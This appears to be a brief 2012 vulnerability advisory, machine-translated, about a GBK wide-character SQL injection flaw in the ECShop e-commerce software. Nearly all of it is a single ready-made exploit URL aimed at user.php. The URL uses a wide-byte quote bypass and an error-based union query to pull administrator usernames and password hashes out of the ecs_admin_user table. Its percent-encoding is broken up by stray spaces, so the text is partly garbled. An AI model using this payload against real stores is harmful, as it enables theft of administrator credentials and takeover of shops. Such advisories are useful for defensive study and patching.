ecshop gbk there is a wide-character injection vulnerability-vulnerability warning-the black bar safety net

2012-11-08T00:00:00
ID MYHACK58:62201235451
Type myhack58
Reporter 佚名
Modified 2012-11-08T00:00:00

Description

ecshop to the wide-character filtering or is not complete.

The premise of the following parameters:

http://www.xxx.com/user.php?act=is_registered&username=%ce%2 7%20and%2 0 1=1%20union%20select%2 0 1%20and%2 0%28select%2 0 1%20from%28select%20count%2 8%2 9,concat%2 8%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%2 9%20FROM%20ecs_admin_user%20limit%200,1%2 9,floor%28rand%2 8 0% 2 92%2 9%29x%20from%20information_schema. tables%20group%20by%20x%29a%2 9% 2 0% 2 3

Test report

!